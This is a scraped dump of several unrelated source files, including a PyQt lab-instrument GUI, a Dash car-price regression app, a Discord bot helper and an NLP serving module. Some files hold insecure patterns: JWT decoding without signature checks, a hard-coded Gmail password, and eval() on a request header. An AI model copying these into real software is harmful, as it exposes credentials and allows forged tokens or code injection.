        self.Restyle()
        self.SignalSlotBinding()
        self.show()
    #——————————————————————————————————#
    def UILoader(self):
        """Load the Qt Designer layout onto this widget."""
        self.ui=uic.loadUi('PI_GUI_App_Map.ui',self)
    def Restyle(self):
        """Restore previous inputs from appmap_his.txt and populate the widgets."""
        self.setWindowTitle('Approach Curve-Map')
        # NOTE(review): expects at least four lines in the history file, but
        # SaveRecord below writes the fields without newline separators — a
        # freshly saved file may not round-trip; verify the file format.
        with open(r'appmap_his.txt','r') as file:
            history=file.readlines()
        self.lineEdit_xp.setText(history[0])
        self.lineEdit_yp.setText(history[1])
        self.lineEdit_monitee.setText(history[2])
        self.lineEdit_stbr.setText(history[3])
        # self.lineEdit_xp.setText('0')
        # self.lineEdit_yp.setText('0')
        # Preset z sweep orders: descending (approach) and ascending (retract).
        self.combo_zp.addItem('450,350,300,250,200,150,125,100,90,80,70,60,50,45,40,35,30,25,20,15,10,8,6,4,2,0')
        self.combo_zp.addItem('0,2,4,6,8,10,15,20,25,30,35,40,45,50,60,70,80,90,100,125,150,200,250,300,350,450')
        self.combo_zp.setCurrentText(self.combo_zp.itemText(0))
        # self.lineEdit_monitee.setText(r'C:\Users\jy1u18\OneDrive - University of Southampton\PhD\Second Project\Electrochemistry')
        # self.lineEdit.setText('dis,dis')
    def SignalSlotBinding(self):
        """Connect GUI widgets to their slots."""
        self.checkBox.clicked.connect(self.RenameSwitch)
        self.proceed.clicked.connect(self.StartExp)
        self.toolButton.clicked.connect(self.FileBrowser)
    ##### GUI Slots
    def RenameSwitch(self):
        """Enable/disable the rename field with its checkbox."""
        if self.checkBox.isChecked():
            self.label_3.setEnabled(True)
            self.lineEdit_stbr.setEnabled(True)
        else:
            self.label_3.setEnabled(False)
            self.lineEdit_stbr.setEnabled(False)
    def StartExp(self):
        """Persist inputs, validate state, then start the monitor threads."""
        permission=False
        self.SaveRecord()
        permission=self.StatusCheck()
        if permission==True:
            self.ExpMonitor()
            if self.checkBox.isChecked():
                self.RenameMonitor()
    def SaveRecord(self):
        """Overwrite appmap_his.txt with the current widget values."""
        # Truncate, then append each field.
        file=open(r'appmap_his.txt','w')
        file.close()
        with open(r'appmap_his.txt','a') as file:
            for widget in [self.lineEdit_xp, self.lineEdit_yp,self.lineEdit_monitee,self.lineEdit_stbr]:
                text=widget.text()
                # NOTE(review): no newline is written between fields — see Restyle.
                file.write(text)
    def StatusCheck(self):
        """Validate hardware state and parse all inputs; True when ready."""
        try:
            self.mainthread.ServoCheck()
            self.list_read(widget=self.lineEdit_xp,tlist=self.xlist,ty=int)
            self.list_read(widget=self.lineEdit_yp,tlist=self.ylist,ty=int)
            self.list_read(widget=self.combo_zp,tlist=self.zlist,ty=int)
            self.num3d=len(self.xlist)*len(self.ylist)*len(self.zlist)
            self.num2d=len(self.xlist)*len(self.ylist)
            self.filename=self.lineEdit_monitee.text().rstrip()
            print(self.filename)
            self.list_read(widget=self.lineEdit_stbr,tlist=self.replaced_list,ty=str)
            self.count_file=self.filename+r'\count.txt'
            return True
        except Exception as arg_err:
            # NOTE(review): these compare an exception *instance* to a class /
            # another instance with ``==`` and are therefore never True —
            # ``isinstance(arg_err, FileNotFoundError)`` was likely intended.
            if arg_err==FileNotFoundError:
                self.mainthread.LogWriter('Create a count.txt file in the target directory first.')
                self.mainthread.LogWriter(arg_err)
            elif arg_err==ValueError('qSVO of a device returned False'):
                self.mainthread.LogWriter('Turn on servo of each axis first.')
                self.mainthread.LogWriter(arg_err)
            else:
                self.mainthread.LogWriter('Unknown Error.')
                self.mainthread.LogWriter(arg_err)
    def ExpMonitor(self):
        """Start the experiment monitor thread and wire its signals."""
        self.ProgressBar()
        self.mon_thrd=mof.ExpMonitor(self.mainthread,self.xlist,self.ylist,self.zlist,self.num3d,self.count_file)
        self.mainthread.threadlist.append(self.mon_thrd)
        self.mon_thrd.sig_ascent.connect(self.Signal_Ascent)
        self.mon_thrd.sig_complete.connect(self.ExpComplete)
        self.mon_thrd.sig_progressbar.connect(self.progressbar.setValue)
        # self.mon_thrd.sig_error.connect(lambda: self.msgrunning.cancel())
        self.mon_thrd.start()
        self.proceed.setEnabled(False)
    def RenameMonitor(self):
        """Start the thread that renames output files as they appear."""
        self.rename_thrd=mof.RenameMonitor(self.mainthread,self.filename,self.replaced_list,self.zlist)
        self.mainthread.threadlist.append(self.rename_thrd)
        self.rename_thrd.start()
    def FileBrowser(self):
        """Pick the folder to monitor; keep the old value on cancel."""
        path=self.lineEdit_monitee.text()
        self.filename=QFileDialog.getExistingDirectory(None,'Monitor Folder',path)
        if self.filename=='':
            pass
        else:
            self.lineEdit_monitee.setText(self.filename)
    ##### Monitor Thread Slots
    def ThreadError(self,string):
        """Show a warning dialog with *string* from a worker thread."""
        self.thread_error=QMessageBox()
        self.thread_error.setIcon(QMessageBox.Warning)
        self.thread_error.setText(string)
        self.thread_error.setStandardButtons(QMessageBox.Ok)
        self.thread_error.setWindowTitle('Error')
        self.thread_error.show()
    def Signal_Ascent(self,paraset):
        """Move axis paraset[0] by step paraset[1] at a step-derived velocity."""
        index=paraset[0]
        step=paraset[1]
        # Velocity heuristic: tiny nonzero speed for zero steps, half-speed
        # for large steps, full magnitude otherwise (4-decimal precision).
        if paraset[1]==0:
            vel=0.001
        elif paraset[1]>0.1:
            vel=float(format(np.abs(paraset[1]/2),'.4f'))
        else:
            vel=float(format(np.abs(paraset[1]),'.4f'))
        self.mainthread.MoveTo(index,step,vel)
    def ExpComplete(self):
        """Tear down monitor threads and progress widgets when done."""
        self.mainthread.LogWriter('Experiments done!')
        try:
            self.mon_thrd.terminate()
            self.rename_thrd.terminate()
        except Exception as arg_err:
            self.mainthread.LogWriter('Thread Terminating Error: ')
            self.mainthread.LogWriter(arg_err)
        self.proceed.setEnabled(True)
        self.progressbar.deleteLater()
        self.progresslabel.deleteLater()
        QApplication.processEvents()
    def ProgressBar(self):
        """Create and add the progress bar + caption to the layout."""
        self.progressbar=QProgressBar()
        self.progressbar.setValue(0)
        self.progressbar.setAlignment(Qt.AlignCenter)
        self.progresslabel=QLabel()
        self.progresslabel.setText(
            'Approach Curve experiments running. Do not close this window while running! '
        )
        self.progresslabel.setAlignment(Qt.AlignCenter)
        sizePolicy=QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)
        self.progresslabel.setSizePolicy(sizePolicy)
        self.verticalLayout.addWidget(self.progressbar)
        self.verticalLayout.addWidget(self.progresslabel)
    ##### Auxilary Function
    def list_read(self,widget,tlist,ty=int):
        """Parse a comma list (with '(start stop step)' range groups) from a
        widget into *tlist* in place; elements are cast with *ty*."""
        try:
            try:
                string=widget.text()
            except Exception:
                # Combo boxes expose currentText() instead of text().
                string=widget.currentText()
            res=[]
            element=string.split(",")
            sets=[]
            num=[]
            for ele in element:
                if '(' in ele:
                    sets.append(ele)
                else:
                    num.append(ty(ele))
            res+=list(map(ty, num))
            for i in sets:
                # Expand "(start stop step)" into an inclusive-start range.
                numset=re.findall(r'[(](.*?)[)]', i)
                rangepara=numset[0].split(' ')
                rangepara=list(map(ty, rangepara))
                res+=np.arange(rangepara[0],rangepara[1]+1,rangepara[2]).tolist()
            tlist[:]=res
        except Exception as arg_err:
            self.mainthread.LogWriter('Input parameter error:')
            self.mainthread.LogWriter(arg_err)
            self.reading_error=QMessageBox()
            self.reading_error.setIcon(QMessageBox.Critical)
            self.reading_error.setText('Potentially input error, please check your inputs\n See log widget for more infomation.')
            self.reading_error.setStandardButtons(QMessageBox.Ok)
            self.reading_error.setWindowTitle('Error')
            self.reading_error.show()
        # NOTE(review): if parsing failed before ``res`` was assigned, this
        # raises NameError — callers rely on *tlist* rather than the return.
        return res
    def closeEvent(self,event):
        """Stop worker threads when the window closes."""
        try:
            self.mon_thrd.terminate()
            self.rename_thrd.terminate()
            self.mainthread.LogWriter('Thread terminated.')
        except Exception as arg_err:
            # AttributeError just means the threads were never started.
            if type(arg_err)!=AttributeError:
                self.mainthread.LogWriter(arg_err)
if __name__=='__main__':
    # NOTE(review): Appmap expects ``mainthread`` to provide LogWriter/MoveTo/
    # ServoCheck/threadlist; a bare QWidget does not, so this standalone entry
    # point only exercises the layout — confirm before relying on it.
    app = QApplication(sys.argv)
    win=QWidget()
    ui=Appmap(win)
    sys.exit(app.exec_())
{
"api_name": "PyQt5.QtWidgets.QWidget",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtCore.pyqtSignal",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "PyQt5.uic.loadUi",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "PyQt... |
70721629544 | from datetime import datetime
import os
class Config:
    """Static configuration for the football-prediction pipeline: data-source
    URLs, Azure storage names, league metadata and column mappings."""
    FOOTBALL_DATA_URL = "https://www.football-data.co.uk"
    FOOTBALL_DATA_TABLE = "mmz4281"
    # Azure access
    # NOTE(review): these raise KeyError at import time when the environment
    # variables are unset — confirm that is the intended failure mode.
    AZURE_CONNECTION_STRING = os.environ["AZURE_CONNECTION_STRING"]
    AZURE_CONTAINER_NAME = os.environ["AZURE_CONTAINER_NAME"]
    AZURE_RESULTS_TABLE = "results"
    AZURE_FIXTURES_TABLE = "fixtures"
    AZURE_PROCESSED_TABLE = "processed"
    AZURE_PREDICTIONS_TABLE = "predictions"
    AZURE_MODELS_FOLDER = "models"
    # fpath
    PREDICTED_FPATH = "static/predicted.txt"
    # starting year for each league (two-digit season start, e.g. 5 -> 2005/06)
    LEAGUES = {"E0": 5,
               "D1": 6,
               "I1": 5,
               "SP1": 5,
               "F1": 5,
               "E1": 5,
               "P1": 17,
               "N1": 17,
               "T1": 17,
               "B1": 17}
    # First and last season (starting year).
    # For current year, get current year and subtract 1 if current month is June or lower.
    # So long as something like covid does not happen again, this assumption should hold.
    FIRST_SEASON = 5
    # NOTE(review): datetime.now() is evaluated twice; across a New Year
    # midnight boundary the calls could disagree — harmless in practice.
    CURRENT_SEASON = (datetime.now().year - 2000) - (datetime.now().month <= 6)
    # column mapping: football-data.co.uk column names -> internal feature names
    TARGET_COL = "F_H_DIFF"
    COL_MAPPING = {"Div": "F_DIV",
                   "Date": "F_DATE",
                   "Time": "F_TIME",
                   "HomeTeam": "F_H_TEAM",
                   "AwayTeam": "F_A_TEAM",
                   "FTHG": "F_H_GOALS",
                   "FTAG": "F_A_GOALS",
                   "FTR": "F_RESULT",
                   "HS": "F_H_SHOTS",
                   "AS": "F_A_SHOTS",
                   "HST": "F_H_TSHOTS",
                   "AST": "F_A_TSHOTS",
                   "HF": "F_H_FOULS",
                   "AF": "F_A_FOULS",
                   "HC": "F_H_CORNERS",
                   "AC": "F_A_CORNERS",
                   "HY": "F_H_YELLOWS",
                   "AY": "F_A_YELLOWS",
                   "HR": "F_H_REDS",
                   "AR": "F_A_REDS",
                   "BbMxH": "ODDS_H_MAX",
                   "BbMxD": "ODDS_D_MAX",
                   "BbMxA": "ODDS_A_MAX",
                   "MaxH": "ODDS_H_MAX",
                   "MaxD": "ODDS_D_MAX",
                   "MaxA": "ODDS_A_MAX",
                   "BbAvH": "ODDS_H_AVG",
                   "BbAvD": "ODDS_D_AVG",
                   "BbAvA": "ODDS_A_AVG",
                   "AvgH": "ODDS_H_AVG",
                   "AvgD": "ODDS_D_AVG",
                   "AvgA": "ODDS_A_AVG"}
    # numeric model output -> Home/Draw/Away label
    PRED_MAPPING = {1.0: "H",
                    0.0: "D",
                    -1.0: "A"}
| dimasikson/football-prediction-web-app | src/utils/config.py | config.py | py | 2,578 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "datetime.datetim... |
70677607784 | import jwt
class User:
    """Lightweight request-user container populated by RequestJwtMiddleware.

    NOTE(review): these are class-level attributes. If the *class* (rather
    than an instance) is attached to a request, the values — including the
    mutable ``groups`` list — are shared process-wide across requests.
    """
    id = None
    email = None
    groups = []
    company = None
class RequestJwtMiddleware:
    """Django middleware that decodes a Bearer JWT from the Authorization
    header and attaches the claims to ``request.user_object``.

    Fix: the original assigned the ``User`` *class* to ``request.user_object``
    and then set class attributes, so every request (and thread) shared the
    same id/email/groups/company. A fresh instance is now created per request.
    """

    def __init__(self, get_response):
        self.get_response = get_response

    def get_token_payload(self, request):
        """Return the decoded JWT payload, or {} when no Bearer token is present."""
        authorization = request.META.get("HTTP_AUTHORIZATION", "")
        try:
            token = authorization.split("Bearer ")[1]
        except IndexError:
            # No "Bearer " prefix (missing or differently-typed credentials).
            return {}
        # NOTE: signature verification is intentionally disabled (verify=False);
        # an upstream gateway is assumed to have validated the token.
        payload = jwt.decode(token, verify=False)
        return payload

    def __call__(self, request):
        payload = self.get_token_payload(request)
        # Per-request instance — never the shared class (see class docstring).
        request.user_object = User()
        if payload:
            request.user_object.id = payload["sub"]
            request.user_object.email = payload["email"]
            request.user_object.groups = [g for g in payload["scope"].split(" ")]
            request.user_object.company = payload["clt-ref"]
        response = self.get_response(request)
        return response
{
"api_name": "jwt.decode",
"line_number": 24,
"usage_type": "call"
}
] |
11002983130 | #! /usr/bin/env python3.
from os import path
from pydub import AudioSegment
from custom_filesystem import CustomFilesystem, WAV_EXTENSION
import speech_accent_archive_analysis
# Create a wav duplicate (in the same directory) for an mp3 recording.
def create_wav_duplicate(mp3_recording_path):
path_without_extension = mp3_recording_path[:-4]
wav_recording_path = path_without_extension + WAV_EXTENSION
sound = AudioSegment.from_mp3(mp3_recording_path)
sound.export(wav_recording_path, format="wav")
if __name__ == '__main__':
    # Create wav duplicates for all the recordings in the Speech Accent Archive dataset.
    recordings_per_language = speech_accent_archive_analysis.recordings_per_language()
    custom_filesystem = CustomFilesystem()
    print("Creating wav duplicates for the following files:")
    # ``language`` is unused; iteration only needs the recording lists.
    for language, recordings in recordings_per_language.items():
        for recording in recordings:
            mp3_recording_path = custom_filesystem.mp3_recording_path(recording)
            print(mp3_recording_path)
            create_wav_duplicate(mp3_recording_path)
| albertojrigail/accented-speech-recognition | mp3-to-wav.py | mp3-to-wav.py | py | 1,112 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "custom_filesystem.WAV_EXTENSION",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "pydub.AudioSegment.from_mp3",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pydub.AudioSegment",
"line_number": 11,
"usage_type": "name"
},
{
"ap... |
29656067370 | from cgitb import html
import smtplib
from email.message import EmailMessage
from string import Template
from pathlib import Path
# NOTE(review): the `from cgitb import html` above is immediately shadowed by
# the Template assignment below and appears unused.
# Load the HTML body as a string.Template so $-placeholders can be substituted.
html = Template(Path('index.html').read_text())
email = EmailMessage()
email['from'] = 'Gio Choa'
email['to'] = 'beautyhealthgojp@gmail.com'
email['subject'] = 'test in python'
# Render the template ($name -> 'jacky') and attach it as the HTML body.
email.set_content(html.substitute({'name': 'jacky'}), 'html')
# Send the message through Gmail's SMTP server using STARTTLS on port 587.
with smtplib.SMTP(host='smtp.gmail.com', port=587) as smtp:
    smtp.ehlo()
    smtp.starttls()
    # NOTE(review): credentials are hard-coded in source — move them to
    # environment variables or a secrets store.
    smtp.login('giochoa0422@gmail.com', 'Faith3:16')
    smtp.send_message(email)
    print('message on the way')
print('message on the way') | giochoa/pythontest | emailwithpython/email_sender.py | email_sender.py | py | 582 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cgitb.html",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "string.Template",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "email.message",
"line_number... |
39082569651 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
import numpy as np
from sklearn.linear_model import LinearRegression
import pandas as pd
import plotly.graph_objects as go
from sklearn import svm
from sklearn.model_selection import train_test_split
from app import app
from app import server
## Data loading and column groups for the dashboard controls
df = pd.read_csv("data/carData.csv")
# Columns selectable as the regression abscissa.
svar = ('Year', 'Owner','Selling_Price', 'Present_Price', 'Kms_Driven')
# Quantitative columns (boxplots, regression ordinate).
vquanti = ('Selling_Price', 'Present_Price', 'Kms_Driven')
# Qualitative columns (histograms).
vquali = ('Car_Name','Year','Fuel_Type', 'Seller_Type', 'Transmission')
app.layout = html.Div([
html.Div([
html.Div([
html.H1(''' Analyse univariée ''')
]),
html.Div([
html.Div([
html.H2(''' Variables qualitatives '''),
html.Div([
html.Div('''Choisir une variable'''),
dcc.Dropdown(
id='vquali_choose',
options=[{'label': i, 'value': i} for i in vquali],
value='Year'
),
],
style={'width': '48%', 'display': 'inline-block'}),
dcc.Graph(id='univariate_quali'),
]),
html.Div([
html.H2(''' Variables quantitatives '''),
html.Div([
html.Div('''Choisir une variable'''),
dcc.Dropdown(
id='vquanti_choose',
options=[{'label': i, 'value': i} for i in vquanti],
value='Selling_Price'
),
],
style={'width': '48%', 'display': 'inline-block'}),
dcc.Graph(id='univariate_quanti'),
html.Div('''Les boxplots permettent de voir la répartition des données.
On voit d'un seul coup d'oeil où se situent le min, Q1, la médiane, Q3 et le max, ainsi que les valeurs extrêmes.
'''),
]),
], style={'columnCount': 2,}
),
],
),
html.Div([
html.H1(''' Regression linéaire et SVM'''),
html.Div([
html.Div([
html.Div([
html.Div('''Abscisse'''),
dcc.Dropdown(
id='xaxis-column',
options=[{'label': i, 'value': i} for i in svar],
value='Year'
),
],
style={'width': '48%', 'display': 'inline-block'}),
html.Div([
html.Div('''Ordonnée'''),
dcc.Dropdown(
id='yaxis-column',
options=[{'label': i, 'value': i} for i in vquanti],
value='Selling_Price'
),
],
style={'width': '48%', 'display': 'inline-block'}
),
]),
]),
html.Div([
html.Div([
html.H2(''' Regression linéaire univariée'''),
html.Div(''' N'ayant observé aucune différence entre les différentes méthodes de régression linéaire univariée, la regression ci-dessous a été réalisé avec sklearn.
'''),
dcc.Graph(id='linear'),
]),
html.Div([
html.H2(''' SVM '''),
dcc.Graph(id='svm'),
]),
],
style={'columnCount': 2,} ),
html.Div('''Différence entre regression linéaire univariée et SVR univariée : La SVR cherche a maximiser les marges.
Alors que la régression linéaire cherche à minimiser les erreurs.
'''),
]),
# html.Div([
# html.Div([
# html.H1('''Regression linéaire multiple'''),
# html.Div([
# ], id = 'regmulti' ),
# ]),
# ]),
html.Div('''Question bonus - Quelles données manque-il à votre analyse ? -
On pourrait regarder la date du contrôle technique et regarder s'il contient une ou plusieurs reparations à faire.
On peut aussi se demander à quelle série appartient la voiture ?
Est-ce que la voiture a t-elle été déjà accidentée ?
Est-ce que la courroie de distribution a t-elle été changée ?
...
Les données manquantes sont de ce fait, des données techniques sur la voiture.
'''),
])
## Callback
@app.callback(
    Output('linear', 'figure'),
    [Input('xaxis-column', 'value'),
    Input('yaxis-column', 'value')])
def graph_reg(xvar, yvar):
    """Fit a univariate linear regression of df[yvar] on df[xvar] and plot it.

    Returns a plotly figure with train/test scatter traces and the fitted line.
    """
    x = df[xvar].values.reshape(-1, 1)
    y = df[yvar].values
    # NOTE: the split is only used for display; the model is fitted on ALL data.
    X_train, X_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=0)
    model = LinearRegression().fit(x, y)
    # Evaluate the fitted line on a dense grid for a smooth trace.
    x_range = np.linspace(x.min(), x.max(), 100)
    y_range = model.predict(x_range.reshape(-1, 1))
    fig = go.Figure([
        go.Scatter(x=X_train.squeeze(), y=y_train, name='train', mode='markers'),
        go.Scatter(x=X_test.squeeze(), y=y_test, name='test', mode='markers'),
        go.Scatter(x=x_range, y=y_range, name=('Y = %f.X + %f' %(model.coef_, model.intercept_)))
    ])
    fig.update_xaxes(title=xvar)
    fig.update_yaxes(title=yvar)
    return fig
@app.callback(
    Output('univariate_quali', 'figure'),
    [Input('vquali_choose', 'value')])
def graph_quali(var):
    """Histogram of the selected qualitative column of df."""
    return px.histogram(df, x=var)
@app.callback(
    Output('univariate_quanti', 'figure'),
    [Input('vquanti_choose', 'value')])
def graph_quanti(var):
    """Boxplot of the selected quantitative column of df."""
    return px.box(df, x=var)
@app.callback(
    Output('svm', 'figure'),
    [Input('xaxis-column', 'value'),
    Input('yaxis-column', 'value')])
def graph_svm(xvar, yvar):
    """Fit a linear-kernel SVR of df[yvar] on df[xvar] and plot it.

    NOTE(review): near-duplicate of graph_reg — only the model differs;
    consider factoring the shared plotting code into a helper.
    """
    x = df[xvar].values.reshape(-1, 1)
    y = df[yvar].values
    # The split is only displayed; the model is fitted on ALL data.
    X_train, X_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=0)
    model = svm.SVR(kernel="linear").fit(x, y)
    x_range = np.linspace(x.min(), x.max(), 100)
    y_range = model.predict(x_range.reshape(-1, 1))
    fig = go.Figure([
        go.Scatter(x=X_train.squeeze(), y=y_train, name='train', mode='markers'),
        go.Scatter(x=X_test.squeeze(), y=y_test, name='test', mode='markers'),
        go.Scatter(x=x_range, y=y_range, name=('Y = %f.X + %f' %(model.coef_, model.intercept_)))
    ])
    fig.update_xaxes(title=xvar)
    fig.update_yaxes(title=yvar)
    return fig
# @app.callback(Output('regmulti', 'children'))
# def graph_multi():
# data = pd.DataFrame(df, columns=['Year','Kms_Driven', 'Selling_Price']),
# col_transform = pd.DataFrame(df, columns=['Transmission'])
# dummies = pd.get_dummies(col_transform)
# xm = np.array(data.join(dummies))
# ym = df['Selling_Price'].values
# reg = LinearRegression().fit(xm, ym)
# print('Sklearn multiple - Coefficients:', reg.coef_)
# b1 = (reg.intercept_)
# return b1
####
# Run the Dash development server when executed as a script.
if __name__ == '__main__':
    app.run_server(debug=True)
| estellekayser/cars | index.py | index.py | py | 7,502 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "app.app.layout",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "app.app",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "dash_html_components.Div"... |
26030345486 | import os
import sys
#モジュール探索パス追加
p = ['../','../../','../../../']
for e in p: sys.path.append(os.path.join(os.path.dirname(__file__),e))
import discord
import re
import requests
import database
class UserFunc():
    """Validation helpers for user-supplied identifiers."""
    def __init__(self) -> None:
        pass
    # Validate an entered (Nintendo Switch) friend code.
    def check_friendcode(self, friendcode: str) -> bool:
        """Return True iff *friendcode* has the exact form 'dddd-dddd-dddd'."""
        # fullmatch anchors the whole string; unlike search with ^...$ it also
        # rejects a trailing newline.
        return re.fullmatch(r"\d{4}-\d{4}-\d{4}", friendcode) is not None
    # Validate an entered Twitter ID.
    def check_twitterid(self, twitterid: str) -> bool:
        """Return True iff *twitterid* is 1-15 characters of [0-9a-zA-Z_]."""
        return re.fullmatch(r"[0-9a-zA-Z_]{1,15}", twitterid) is not None
class UserDBFunc():
    """Async wrapper around the user database (user-master / user-log tables)."""
    def __init__(self) -> None:
        self.db = database.Database()
    # Fetch the stored data for the given user.
    async def get_userdata(self, userid:str) -> list:
        """Read the user-master row keyed by Discord ID and return the parsed JSON body."""
        r = await self.db.get_db(name='read', table='user-master', column='DiscordID', record=str(userid))
        ud = r.json()
        return ud
    # Submit (write) the given user's data.
    async def post_userdata(self, userid:str, postdata:dict, apptype:int) -> requests.Response:
        """Write *postdata* to the user-master row keyed by Discord ID."""
        r = await self.db.post_db(name='write', data=postdata, table='user-master', column='DiscordID', record=str(userid), apptype=apptype)
        return r
    # Log a user-data submission.
    async def log_userdata(self, author:discord.User, postdata:dict, currenttime:str, apptype:int) -> requests.Response:
        """Append an audit-log entry for a user-data submission to the user-log table.

        NOTE(review): mutates *postdata* in place by deleting the date keys —
        confirm callers do not reuse the dict afterwards.
        """
        # Japanese schema keys: "registration time" and "last updated time".
        # They are part of the stored schema — do not translate.
        datekey = ["登録日時", "最終更新日時"]
        for k in datekey:
            if k in postdata: del postdata[k]
        # Added keys: timestamp, request type, executor Discord name, executor Discord ID.
        add = {"タイムスタンプ":currenttime, "申請区分":apptype, "実行者Discord名": str(author), "実行者DiscordID": str(author.id)}
        logdata = postdata|add
        r = await self.db.post_db(name='log', data=logdata, table='user-log')
r = await self.db.post_db(name='log', data=logdata, table='user-log')
return r | rich-bread/bmdb_bot | menu/usermenu/cmfunc/userfunc.py | userfunc.py | py | 1,852 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
40885660668 | import json
import logging
import os.path
from importlib import import_module
from nlp_architect.utils.io import gzip_str
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def format_response(resp_format, parsed_doc):
    """
    Transform string of server's response to the requested format

    Args:
        resp_format(str): the desired response format (may be None/empty)
        parsed_doc: the server's response

    Returns:
        formatted response (JSON passthrough by default, gzipped bytes on request)
    """
    logger.info('preparing response JSON')
    ret = None
    # BUGFIX: check the falsy case FIRST. The original evaluated
    # `'json' in resp_format` before `not resp_format`, raising a TypeError
    # when resp_format was None. JSON remains the default format.
    if (not resp_format) or (resp_format == "json") or ('json' in resp_format):
        ret = parsed_doc
    # `'gzip' in resp_format` already covers resp_format == "gzip"; the guard
    # keeps a None/empty format from raising.
    if resp_format and ('gzip' in resp_format):
        ret = gzip_str(parsed_doc)
    return ret
def parse_headers(req_headers):
    """
    Load the recognized header values from a request into a dictionary.

    Args:
        req_headers (dict): the request's headers

    Returns:
        dict: every recognized header name mapped to its value, or None when absent
    """
    recognized = ("CONTENT-TYPE", "CONTENT-ENCODING", "RESPONSE-FORMAT",
                  "CLEAN", "DISPLAY-POST-PREPROCCES",
                  "DISPLAY-TOKENS", "DISPLAY-TOKEN-TEXT", "IS-HTML")
    headers = {}
    for tag in recognized:
        headers[tag] = req_headers[tag] if tag in req_headers else None
    return headers
def set_headers(res):
    """
    Set the CORS headers expected by browser clients on the response.

    Args:
        res (:obj:`falcon.Response`): the response to mutate
    """
    cors_headers = (
        ('Access-Control-Allow-Origin', '*'),
        ("Access-Control-Allow-Credentials", "true"),
        ('Access-Control-Allow-Methods', "GET,HEAD,OPTIONS,POST,PUT"),
        ('Access-Control-Allow-Headers',
         "Access-Control-Allow-Headers, Access-Control-Allow-Origin,"
         " Origin,Accept, X-Requested-With, Content-Type, "
         "Access-Control-Request-Method, "
         "Access-Control-Request-Headers, Response-Format, clean, "
         "display-post-preprocces, display-tokens, "
         "display-token-text"),
    )
    for header_name, header_value in cors_headers:
        res.set_header(header_name, header_value)
def package_home(gdict):
    """
    Return the directory of the module whose globals dict is *gdict*.
    (Helper for building paths from out-of-class scripts.)
    """
    return os.path.dirname(gdict["__file__"])
def extract_module_name(model_path):
    """
    Extract the module's class name from its path.

    Args:
        model_path(str): the module's class path (e.g. "bist_parser.api")

    Returns:
        str: the CamelCase class name (e.g. "BistParser")
    """
    stem = model_path.split(".")[0]
    return "".join(part.title() for part in stem.split("_"))
class Service(object):
    """Handles loading and inference using specific models"""
    def __init__(self, service_name):
        # Populated by load_service(): service category ("core"/"annotate")
        # and whether the backing model is spacy-based.
        self.service_type = None
        self.is_spacy = False
        self.service = self.load_service(service_name)
    def get_paragraphs(self):
        # Delegate to the wrapped service's paragraph accessor.
        return self.service.get_paragraphs()
    # pylint: disable=eval-used
    def get_service_inference(self, docs, headers):
        """
        get parser response from service API

        Args:
            headers (list(str)): the headers of the request
            docs: input received from the request

        Returns:
            the service API output
        """
        logger.info('sending documents to parser')
        response_data = []
        for i, doc in enumerate(docs):
            inference_doc = self.service.inference(doc["doc"])
            if self.is_spacy is True:
                parsed_doc = inference_doc.displacy_doc()
                doc_dic = {"id": doc["id"], "doc": parsed_doc}
                # Potentially a security risk: eval() executes header-supplied text.
                if headers['IS-HTML'] is not None and eval(headers['IS-HTML']):
                    # a visualizer request: add type of service (core/annotate) to response
                    doc_dic["type"] = self.service_type
                response_data.append(doc_dic)
            else:
                # Non-spacy services return a plain dict; tag it with a 1-based id.
                inference_doc['id'] = i + 1
                response_data.append(inference_doc)
        return response_data
    def load_service(self, name):
        """
        Initialize and load service from input given name, using "services.json" properties file

        Args:
            name (str):
                The name of service to upload using server

        Returns:
            The loaded service
        """
        # services.json lives next to this module and maps service names to
        # implementation files and metadata.
        with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), "services.json")) \
                as prop_file:
            properties = json.load(prop_file)
        folder_path = properties["api_folders_path"]
        service_name_error = "'{0}' is not an existing service - " \
                             "please try using another service.".format(name)
        if name in properties:
            model_relative_path = properties[name]["file_name"]
        else:
            logger.error(service_name_error)
            raise Exception(service_name_error)
        if not model_relative_path:
            logger.error(service_name_error)
            raise Exception(service_name_error)
        # Derive the dotted module path and CamelCase class name, import the
        # module dynamically, then instantiate the API class and load its model.
        module_path = ".".join(model_relative_path.split(".")[:-1])
        module_name = extract_module_name(model_relative_path)
        module = import_module(folder_path + module_path)
        class_api = getattr(module, module_name)
        upload_service = class_api()
        upload_service.load_model()
        self.service_type = properties[name]["type"]
        self.is_spacy = properties[name].get('spacy', False)
        return upload_service
| IntelLabs/nlp-architect | server/service.py | service.py | py | 5,596 | python | en | code | 2,921 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "nlp_architect.utils.io.gzip_str",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os... |
